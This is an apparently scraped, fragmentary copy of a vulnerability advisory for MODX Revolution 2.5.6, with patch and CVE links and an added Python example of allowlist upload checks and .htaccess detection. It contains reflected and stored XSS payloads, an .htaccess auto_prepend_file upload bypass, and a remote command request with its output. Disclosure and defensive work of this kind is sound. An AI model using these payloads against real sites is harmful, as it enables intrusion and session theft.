26 January 2018 / 4 minutes of reading
<code>action</code>. However, this vulnerability is exploitable only when the server uses PHP 5.3.3, which is the minimal version of PHP supported by Modx Revolution 2.5.6.
```
GET /setup/index.php?action=database&database_type="><script>alert(1)<script> HTTP/1.1
Host: localhost
Connection: close
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
Cookie: modx_setup_language=en; PHPSESSID=20410ami2ep7vpa0bt33bcv464
```
Patch:<br>
<a href="https://github.com/modxcms/revolution/pull/13424">https://github.com/modxcms/revolution/pull/13424</a><br>
CVE:<br>
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9068">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9068</a><br>
<br>
<code>.php</code> or <code>.exe</code>, however a file with the extension <code>.htaccess</code> is allowed. Therefore, the user is able to upload a file with the name <code>.htaccess</code> into the specified folder. This file can contain PHP code, which is appended to every requested file with the extension <code>.php</code> in the specified folder.
<code>.htaccess</code> and the following content:
```
php_value auto_prepend_file .htaccess
php_value output_buffering 1
```
3. The attacker then visits the URL <code>http://localhost/?c=ls%20-al</code> and gets the following response:
```
total 29252
drwxrwxrwx 2 root root 0 Apr 10 15:45 .
drwxrwxrwx 2 root root 0 Apr 7 13:51 ..
-rwxrwxrwx 1 root root 244 Apr 10 15:44 .htaccess
drwxrwxrwx 2 root root 0 Mar 29 11:53 assets
-rwxrwxrwx 1 root root 294 Mar 29 11:53 config.core.php
drwxrwxrwx 2 root root 0 Mar 29 11:50 connectors
drwxrwxrwx 2 root root 0 Mar 29 11:53 core
-rwxrwxrwx 1 root root 198719 Mar 23 16:24 dump.sql
-rwxrwxrwx 1 root root 3441 Mar 28 08:42 ht.access
-rwxrwxrwx 1 root root 1922 Mar 28 08:42 index.php
drwxrwxrwx 2 root root 0 Mar 29 11:50 manager
drwxrwxrwx 2 root root 0 Apr 3 11:13 setup
```
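The root cause above is a denylist upload filter: it blocks a few extensions but lets a file named <code>.htaccess</code> through, and Apache then honours its <code>auto_prepend_file</code> directive. The following added example (not MODX's code; the extension sets and function names are constructed for illustration) contrasts that flawed check with an allowlist check, and adds a detection helper that flags uploaded <code>.htaccess</code> bodies carrying code-prepending directives; the detection also covers <code>AddHandler</code>/<code>AddType</code>/<code>SetHandler</code> directives, which go beyond the payload shown on this page.

```python
import re
from pathlib import PurePosixPath

# Constructed model of the denylist filter described in the advisory: only a
# few extensions are rejected, so ".htaccess" (extension "htaccess") passes.
DENIED_EXTENSIONS = {"php", "phtml", "exe"}

# Constructed allowlist for the hardened check.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

# Apache/PHP directives that cause the server to execute or prepend a file.
# Their presence in an uploaded .htaccess is a strong indicator of the
# technique shown above (auto_prepend_file) or of a handler remap.
SUSPICIOUS_DIRECTIVES = re.compile(
    r"^\s*(?:php_(?:value|flag|admin_value|admin_flag)\s+auto_(?:prepend|append)_file\b"
    r"|(?:AddHandler|AddType|SetHandler)\s+[^\n]*php)",
    re.IGNORECASE | re.MULTILINE,
)


def denylist_allows(filename: str) -> bool:
    """Flawed check: reject only if the last extension is on the denylist."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in DENIED_EXTENSIONS


def allowlist_allows(filename: str) -> bool:
    """Hardened check: exactly one explicitly allowed extension, no dotfiles,
    no path components, no double extensions such as 'shell.php.jpg'."""
    if "\\" in filename:
        return False
    name = PurePosixPath(filename).name
    if name != filename or name.startswith(".") or name in ("", ".", ".."):
        return False
    parts = name.split(".")
    if len(parts) != 2 or not parts[0]:
        return False
    return parts[1].lower() in ALLOWED_EXTENSIONS


def htaccess_is_suspicious(content: str) -> bool:
    """Detection: does an .htaccess body contain a code-executing directive?"""
    return SUSPICIOUS_DIRECTIVES.search(content) is not None
```

Running the denylist against <code>.htaccess</code> reproduces the bypass, while the allowlist rejects it along with dotfiles and double extensions.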
Patch:<br>
<a href="https://github.com/modxcms/revolution/pull/13423">https://github.com/modxcms/revolution/pull/13423</a><br>
CVE:<br>
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9069">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9069</a><br>
<br>
<h2>Authenticated Stored XSS</h2>
A user with resource edit permissions can inject an XSS payload into the title of any post. This malicious payload is triggered for every user who visits the post.<br>
<br>
Example request, which creates a post with a malicious pagetitle:
```
POST /connectors/index.php HTTP/1.1
Host: localhost
Connection: close
Content-Length: 3823
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfuNRFVB7kulIsnU4
Cookie: PHPSESSID=vicnm3b9laomhm7pllfgnbdf95

------WebKitFormBoundaryfuNRFVB7kulIsnU4
Content-Disposition: form-data; name="pagetitle"

home'"><svg/onload=alert(document.domain)//
------WebKitFormBoundaryfuNRFVB7kulIsnU4
Content-Disposition: form-data; name="longtitle"

Congratulations!
------WebKitFormBoundaryfuNRFVB7kulIsnU4
Content-Disposition: form-data; name="description"

...
```
When a victim (authenticated or unauthenticated) visits this post, an alert with the current domain is triggered.<br>
<br>
Patch:<br>
<a href="https://github.com/modxcms/revolution/pull/13415">https://github.com/modxcms/revolution/pull/13415</a><br>
CVE:<br>
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9070">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9070</a><br>
<br>
<h2>Unauthenticated Reflected XSS via HOST header</h2>
The attacker is able to trigger XSS by injecting a payload into the HOST header. However, the likelihood of this attack is minimal, because it is hard to exploit; exploitation is possible via a cache poisoning technique, for example.<br>
<br>
Example request with payload:
```
GET / HTTP/1.1
Host: localhost"
```
Patch:<br>
<a href="https://github.com/modxcms/revolution/pull/13426">https://github.com/modxcms/revolution/pull/13426</a><br>
CVE:<br>
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9071">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9071</a><br>
<br>
<h2>Solution</h2>
Modx Revolution 2.5.7 contains all mentioned patches, so it is recommended to update to the latest version.
<h2>Report timeline</h2>
29.3.2017 Vendor informed about mentioned vulnerabilities<br>
21.4.2017 Vendor released new version of Modx Revolution with fixed vulnerabilities<br>
26.4.2017 Disclosed to public<br>
18.5.2017 Assigned CVEs<br>
<h2>Credits</h2>
These vulnerabilities were discovered by Tomas Melicher from Citadelo.<br>
<h2>References</h2>
<a href="https://forums.modx.com/thread/102084/modx-revolution-2-5-7-a-little-more-secure">https://forums.modx.com/thread/102084/modx-revolution-2-5-7-a-little-more-secure</a><br>
<a href="https://raw.githubusercontent.com/modxcms/revolution/v2.5.7-pl/core/docs/changelog.txt">https://raw.githubusercontent.com/modxcms/revolution/v2.5.7-pl/core/docs/changelog.txt</a><br>